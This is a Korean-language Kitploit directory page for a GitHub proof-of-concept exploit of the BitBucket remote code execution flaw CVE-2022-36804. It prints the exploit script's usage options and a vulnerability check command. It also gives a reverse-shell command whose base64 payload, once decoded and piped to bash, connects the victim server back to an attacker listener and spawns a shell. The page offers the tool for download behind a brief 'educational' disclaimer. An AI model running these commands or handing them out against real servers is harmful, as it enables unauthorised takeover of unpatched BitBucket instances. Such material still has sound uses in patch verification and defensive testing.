Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-36804 — A real exploit for BitBucket RCE CVE-2022-36804 | Kitploit
도구/GitHubGitHub/notdls/cve-2022-36804
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubnotdls/cve-2022-36804

CVE-2022-36804

A real exploit for BitBucket RCE CVE-2022-36804

저장소 보기
3571년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-36804 PoC

이 저장소는 최근 BitBucket 원격 코드 실행 취약점 (CVE-2022-36804)에 대한 간단한 개념 증명 익스플로잇을 포함하고 있습니다. 이 취약점을 악용하려면 대상 인스턴스의 저장소에 접근할 수 있어야 하며, 자격 증명이 없으면 대상에 공개 저장소가 있어야 합니다.

사용법

root@kitploit:~
usage: exploit.py [-h] -p PROJECT -r REPO -u URL [-c COMMAND] [--proxy PROXY] [--session SESSION]
                  [--check]

Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)

optional arguments:
  -h, --help            show this help message and exit
  -p PROJECT, --project PROJECT
                        The name of the project the public repository resides in (E.g.
                        testproject)
  -r REPO, --repo REPO  The name of the public repository (E.g. testrepo)
  -u URL, --url URL     The URL of the BitBucket server (E.g. http://localhost:7990/)
  -c COMMAND, --command COMMAND
                        The command to execute on the server (E.g. 'curl http://canary.domain/')
  --proxy PROXY         HTTP proxy to use for debugging (E.g. http://localhost:8080/)
  --session SESSION     The value of your 'BITBUCKETSESSIONID' cookie, required if your target
                        repo is private. (E.g. 3DD8B1EBA3763AD2611F4940BD870865)
  --check               Only perform a check to see if the instance is vulnerable

예제

인스턴스 취약 여부 확인

인스턴스가 취약한지 확인하려면 다음 명령을 수행합니다

root@kitploit:~
python3 exploit.py -p PROJECT -r REPO -u http://target.site/ --check

리버스 셸 설정

다음 명령은 피해자 시스템에 리버스 셸을 설정하는 데 사용됩니다 (base64 페이로드는 리스너 세부 정보로 업데이트해야 합니다)

root@kitploit:~
python3 exploit.py -p PROJECT -r REPO -u http://localhost:7990/ -c "echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC42Ny4zIiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIikn' | base64 -d  | bash |"

크레딧

  • TheGrandPew - 버그 식별 및 보고

면책 조항

이 익스플로잇은 교육/연구 목적으로만 제공되며, 사용자가 이를 어떻게 사용하는지에 대해 저는 책임지지 않습니다. 좋게 사용해주세요 :)

도구 다운로드